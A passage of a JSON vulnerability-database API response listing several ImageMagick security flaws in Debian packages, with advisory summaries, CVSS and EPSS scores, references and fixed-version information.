"VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-55298", "GHSA-9ccg-6pjw-x645" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r889-wzc7-1yem" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23142?format=api", "vulnerability_id": "VCID-rbdg-vz8x-ykah", "summary": "ImageMagick has heap use-after-free in the MSL encoder\nA heap-use-after-free vulnerability exists in the MSL encoder, where a cloned image is destroyed twice. The MSL coder does not support writing MSL so the write capability has been removed. \n\n```\nSUMMARY: AddressSanitizer: heap-use-after-free MagickCore/image.c:1195 in DestroyImage\nShadow bytes around the buggy address:\n 0x0a4e80007450: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0a4e80007460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0a4e80007470: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0a4e80007480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n 0x0a4e80007490: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\n=>0x0a4e800074a0: fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd\n 0x0a4e800074b0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa\n 0x0a4e800074c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0a4e800074d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0a4e800074e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0a4e800074f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28688.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28688.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28688", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.12789", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.12738", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.12659", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.12854", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00042", "scoring_system": "epss", "scoring_elements": "0.12806", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.13897", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14015", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.13978", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.13928", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.13832", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.13825", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28688" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28688", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28688" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xxw5-m53x-j38c", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T16:02:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xxw5-m53x-j38c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28688", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28688" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445877", "reference_id": "2445877", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445877" }, { "reference_url": "https://github.com/advisories/GHSA-xxw5-m53x-j38c", "reference_id": "GHSA-xxw5-m53x-j38c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xxw5-m53x-j38c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-28688", "GHSA-xxw5-m53x-j38c" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rbdg-vz8x-ykah" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24389?format=api", "vulnerability_id": "VCID-rjkf-pdny-2fhn", "summary": "ImageMagick vulnerable to stack corruption through long morphology kernel names or arrays\nA stack buffer overflow exists in ImageMagick's morphology kernel parsing functions. User-controlled kernel strings exceeding a buffer are copied into fixed-size stack buffers via memcpy without bounds checking, resulting in stack corruption.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28494.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28494.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28494", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02649", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02629", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02625", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02621", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02606", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03326", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03279", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03252", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0323", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03205", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03215", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03335", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28494" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28494", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28494" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-932h-jw47-73jm", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-10T14:40:59Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-932h-jw47-73jm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28494", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28494" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445901", "reference_id": "2445901", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445901" }, { "reference_url": "https://github.com/advisories/GHSA-932h-jw47-73jm", "reference_id": "GHSA-932h-jw47-73jm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-932h-jw47-73jm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-28494", "GHSA-932h-jw47-73jm" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rjkf-pdny-2fhn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20920?format=api", "vulnerability_id": "VCID-ruf5-255v-sfdb", "summary": "ImageMagick: Out of bounds read in multiple coders read raw pixel data\nA heap buffer over-read vulnerability exists in multiple raw image format handles. The vulnerability occurs when processing images with -extract dimensions larger than -size dimensions, causing out-of-bounds memory reads from a heap-allocated buffer.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25576.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25576.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25576", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0283", "published_at": "2026-04-02T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00307", "published_at": "2026-04-21T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00285", "published_at": "2026-04-16T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00287", "published_at": "2026-04-13T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00288", "published_at": "2026-04-18T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.0029", "published_at": "2026-04-09T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00291", "published_at": "2026-04-11T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00293", "published_at": "2026-04-07T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00302", "published_at": "2026-04-04T12:55:00Z" }, { "value": "6e-05", "scoring_system": "epss", "scoring_elements": "0.00308", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25576" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25576", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25576" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:54:37Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/077b42643212d7da8c1a4f6b2cd0067ebca8ec0f", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:54:37Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/077b42643212d7da8c1a4f6b2cd0067ebca8ec0f" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-jv4p-gjwq-9r2j", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:54:37Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-jv4p-gjwq-9r2j" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25576", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25576" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442093", "reference_id": "2442093", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442093" }, { "reference_url": "https://github.com/advisories/GHSA-jv4p-gjwq-9r2j", "reference_id": "GHSA-jv4p-gjwq-9r2j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jv4p-gjwq-9r2j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25576", "GHSA-jv4p-gjwq-9r2j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ruf5-255v-sfdb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21733?format=api", "vulnerability_id": "VCID-sd54-b8z1-2fg7", "summary": "ImageMagick: Integer overflow or wraparound and incorrect conversion between numeric types in the internal SVG decoder\nA crafted SVG file can cause a denial of service. An off-by-one boundary check (`>` instead of `>=`) that allows bypass the guard and reach an undefined `(size_t)` cast.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25989.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25989.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25989", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05261", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05228", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05076", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05071", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05124", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05137", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05154", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05183", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05167", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05133", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", 